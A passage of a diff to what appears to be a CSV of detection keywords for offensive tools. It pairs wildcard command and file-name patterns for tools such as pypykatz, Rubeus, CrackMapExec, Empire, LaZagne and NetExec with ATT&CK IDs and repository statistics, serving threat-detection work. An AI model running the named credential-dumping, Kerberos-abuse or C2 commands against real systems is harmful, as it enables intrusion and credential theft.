*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - 
T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* kerberos brute * -d *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* kerberos brute *.txt*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" 
@@ -1095,47 +1095,47 @@ "* kerberos kirbi parse *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* kerberos spnroast *","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" "* kerberos tgt *kerberos+rc4://*:*@*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7678","1595","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"* kerberos.py*","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. 
CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" "* --key examples/conspicuous.priv --isconspicuous*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "* --key PPLBlade*","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access - Data Exfiltration","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","10","4","324","36","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z" -"* keylogger *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* keylogger *","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" "* --keyword * --check --ocr * --alexa*","offensive_tool_keyword","domainhunter","Checks expired domains for categorization/reputation and Archive.org history to determine good candidates for phishing and C2 domain names ","T1583.002 - T1568.002","TA0011 - TA0009","N/A","N/A","Phishing","https://github.com/threatexpress/domainhunter","1","0","N/A","N/A","10","1380","291","2022-10-26T03:15:13Z","2017-03-01T11:16:26Z" -"* -KillDate *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -KillDays *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -KillDate *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1063","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -KillDays *","offensive_tool_keyword","empire","empire agent.ps1 arguments.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1064","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* kimi.py *","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" -"* KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. 
The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","175","34","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" -"* klist * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"* KittyStager*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"* klist * /service:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" "* knx-gateway-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* knx-gateway-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* KRB hijacking module *","offensive_tool_keyword","krbjack","A Kerberos AP-REQ hijacking tool with DNS unsecure updates abuse.","T1558.002 - T1552.004 - T1048.005","TA0006 - TA0007 ","N/A","N/A","Sniffing & Spoofing","https://github.com/almandin/krbjack","1","0","N/A","10","1","73","13","2023-05-21T15:00:07Z","2023-04-16T10:44:55Z" "* krb5-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --krbpass * --krbsalt * -t * --escalate-user *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" -"* --krbpass *--krbsalt*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","2","900","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* --krbpass *--krbsalt*","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" "* KRBUACBypass*","offensive_tool_keyword","KRBUACBypass","UAC Bypass By Abusing Kerberos Tickets","T1548.002 - T1558 - T1558.003","TA0004 - TA0006","N/A","N/A","Defense Evasion","https://github.com/wh0amitz/KRBUACBypass","1","0","N/A","8","5","402","52","2023-08-10T02:51:59Z","2023-07-27T12:08:12Z" -"* -l nmapRssuilt.xml -v*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - 
T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4019","483","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" +"* -l nmapRssuilt.xml -v*","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hktalent/scan4all","1","0","N/A","10","10","4058","489","2023-09-30T05:33:44Z","2022-06-20T03:11:08Z" "* Ladon.ps1*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* Ladon.py*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* Lalin.sh*","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","350","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "* laps.py *--ldapserver*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "* laps.py *-u * -p *","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" -"* laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" +"* laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z" "* lazypariah*","offensive_tool_keyword","LAZYPARIAH","LAZYPARIAH - A Tool For Generating Reverse Shell Payloads On The Fly","T1059 - T1566 - T1212 - T1574","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/octetsplicer/LAZYPARIAH","1","0","N/A","N/A","2","136","30","2022-06-18T08:59:45Z","2020-11-20T05:08:36Z" -"* ldap * --gmsa *dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" -"* ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* ldap * -u * -p * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" -"* ldap * -u * -p * -M whoami 
*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","525","54","2023-10-03T21:19:24Z","2023-09-08T15:36:00Z" +"* ldap * --gmsa *dump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* ldap * --trusted-for-delegation*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ldap * -u * -p * --admin-count*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"* ldap * -u * -p * -M whoami *","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "* ldap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldap-novell-getpass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldap-rootdse.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ldap-search.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
